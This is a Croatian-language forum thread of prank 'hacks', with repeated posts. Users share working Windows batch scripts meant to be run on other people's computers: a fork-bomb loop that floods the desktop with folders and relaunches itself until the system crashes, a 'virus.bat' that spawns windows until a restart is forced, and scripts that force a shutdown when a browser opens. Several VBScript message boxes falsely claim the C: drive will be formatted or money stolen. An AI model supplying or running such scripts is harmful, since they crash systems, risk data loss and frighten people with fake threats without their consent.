Evo još dvije zanimljive skripte od mene...
Vaši prankovi (šale) i hackovi
- poruka: 1.070
- |
- čitano: 259.238
- |
- moderatori:
DrNasty, pirat, Lazarus Long, XXX-Man, vincimus
Evo još dvije zanimljive skripte od mene...
ja napravio jednu koja ti radi mlrd. ikona na desktopu i usput di napravi totalku na sistemu ( ako čovjek u nekoliko stotinki isključi comp onda ima samo nekoliko mlrd ikona a ako ne reagira onda comp ode ća...) i ako možda zbog nečega na funkcionira onda se ugasi s porukom: Since now, Your computer is a peace of sh**
@echo off
cd %homepath%/Desktop
: bono
md haha_%random%%random%%random%%random%%random%
start 0%
goto bono
shutdown -f -t 600 -c"Since now, Your computer is a peace of sh**" -s
u cemo se to sve radi u kojem programu
Kako staviti lazno upozorenje o virusu na neku datoteku????
Imaš windows error message creator s njom napravi lažnu poruku i to je to...
u cemo se to sve radi u kojem programu
imam još nešto jako dobro za rušenje windowsa! hehe
Dakle kad pokrenete ovu skriptu nema izlaza, bez restarta PC-a!
Nije štetno ali opet kažem, na svoju odgovornost radite
type
start
start
start
start
start
start
start
start
start
start
virus.batspremi kao virus.bat i pokreni! hehe
dali netko zna, kako dodjeliti određenu funkciju tipkama yes i no?
if a = vbYes then
f= MsgBox("Jesi siguran u to što činiš", 74, " Pazi ovdje")
b = MsgBox("Izabrao si DA, odlično, pri sljedećem startupu windows će formatirati disk C:",46 , "Pažnja")
e= MsgBox("Svaka čast na Hrabrosti", 72 , "SuperMan")
else
c = MsgBox("Izabrao si NE, ubrzo očekuj zoološki vrt u svom PC-u",46 , "Pažnja")
d= MsgBox("Žao mi je", 72 , "OK")
End If hehehe
Imaš windows error message creator s njom napravi lažnu poruku i to je to...
e zanima me nekaj, recimo imam neku scriptu i ako u mrezi sad stavim na drugi komp u sharani folder i pokrenem, to se bude onda na njegovome kompu desavalo, ne?
ne, na tvom, dijeliš datoteke, ne i procese
osim ako u skripti nije napravljeno da nešto radi u istom folderu di je exe file il tak nešto.
ak je stavljeno npr. del "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\nesto.txt
onda će ić na tvoj sistemski disk i tvoj username, pošto je pokrenuto na tvom računalu.
Kad se komp upali snimis screenshot cijelog desktopa i stavis ko background, maknes sve shortcuteve i sve sa desktopa negdje u neki direktorij i na kraju sakrijes start meni. Komp ce izgledati normalno sa svim ikonama i start menijem ali kada klikas nista se nece desavat. To su meni cimeri napravili, rekli su mi tek kada sam ubacio cd od wina da imdem napravit reinstall.
Drugi cimer je isto dobio, prvo smo mu izvukli jednu plocicu rama pa je imao samo 512 pa su meu neke igre trzale, trebalo mu je para dana dok nije pokopcao.
Taj isti cimer je dobio i sljedece: uzeli smo mu kabal od napajanja i jednu nozicu (ona koja se steka u zid) precizno obljepili selotejpom tako da se ne vidi na prvi pogled. On upali komp i nece kanta i nece, monitro i sve ostalo radi kanta nece, rastavi on kantu kao mi smo ga isli opet sje..., nije ista nasao,... tako je on skoro cijeli dan rastavljao komp, cak j e i rastavio produzni kabal da vidi dali je ispravan. Nakon nekoliko puta sta je ustekavao i istekavao kabal iz uticnice selotejp se zgulio i komp je cudotvorno proradio, onda smo mu rekli!
Treci cimer: njemu smo pocupali tipke sa tastature i preslozili (naravno prvo smo uslikali tastaturu za svaki slucaj), ali smao slova tak da ne skuzi. Proslo je vec tjedan ili dva i mi zaboravili na to, ide cimer pisati neki seminar i sav u cudu veli da neko nije normalan ili on ili komp (ne moze pisati teksta da ne glada u tastaturu), sta god napise ispadne samo nabacana hrpa slova. Nakon jedno 10-15 min se sjetio probati sa drugom tastaturom, a nakon jos 10-15 min je skuzio da smo mi prckali po tome!
...
ja sam sad napravio nes kao ovo i dali ja mogu napraviti kad on stisne na OK da mu se otvori neki program ovo sam napravio onako bezz
xfire=msgbox("zasto opet palis xfire bas si glup stisni OK za nastavak",74,"Xfire")
ja napravio jednu koja ti radi mlrd. ikona na desktopu i usput di napravi totalku na sistemu ( ako čovjek u nekoliko stotinki isključi comp onda ima samo nekoliko mlrd ikona a ako ne reagira onda comp ode ća...) i ako možda zbog nečega na funkcionira onda se ugasi s porukom: Since now, Your computer is a peace of sh**
@echo off
cd %homepath%/Desktop
: bono
md haha_%random%%random%%random%%random%%random%
start 0%
goto bono
shutdown -f -t 600 -c"Since now, Your computer is a peace of sh**" -s
zna ko napraviti da kad pokrenes recimo firefox/ie/opera ili nekaj trece da se ukombinira shutdown -s -t u to? znaci dok pokrenem shortcut od firefoxa da se komp zgasi za npr 2 min, i po mogucnosti da nema onoga countdowna :)
zna ko napraviti da kad pokrenes recimo firefox/ie/opera ili nekaj trece da se ukombinira shutdown -s -t u to? znaci dok pokrenem shortcut od firefoxa da se komp zgasi za npr 2 min, i po mogucnosti da nema onoga countdowna :)
pa ubaciš još
start iexplore.exe za IE
za ostale browsere ne bi znao, moro bi nać install directory
A gde vi nabavite te skripte,skinete ili napravite?
evo ovako stavi
@echo off
:top
START firefox.exe
shutdown -f -t 50 -c"This is faking joke" -s
probaj i javi ako radi ja ne znam jer nemam firefox
ako zelis ugasiti onda
start > run > shutdown -s
ako pak oces da smanjis vrijeme gasnje kompa onda umjesto 50 stavi manji broj ( oznacava sekunde )
a ako pak oces da otvori vise od jednom firefox onda kopiraj
START firefox.exe jedno ispod drugoga koliko zelis
ajd mi ovo uredi tako da kad stisne yes da se otvori internet explorer
AAAA=msgbox("Vrati mojih pet kuna il si gotov ovim virusom koji krade lovu xD,koji si ti n00b.Ako cete mi dat mojih pet kuna kliknite YES a ako necete ode vise love za to stisnite NO",20,"Achtung")
AAAA=msgbox("Vrati mojih pet kuna il si gotov ovim virusom koji krade lovu xD,koji si ti n00b.Ako cete mi dat mojih pet kuna kliknite YES a ako necete ode vise love za to stisnite NO",20,"Achtung")
evo ovako stavi
@echo off
:top
START firefox.exe
shutdown -f -t 50 -c"This is faking joke" -s
probaj i javi ako radi ja ne znam jer nemam firefox
ako zelis ugasiti onda
start > run > shutdown -s
ako pak oces da smanjis vrijeme gasnje kompa onda umjesto 50 stavi manji broj ( oznacava sekunde )
a ako pak oces da otvori vise od jednom firefox onda kopiraj
START firefox.exe jedno ispod drugoga koliko zelis
Ovo je prava fora.....hehehehe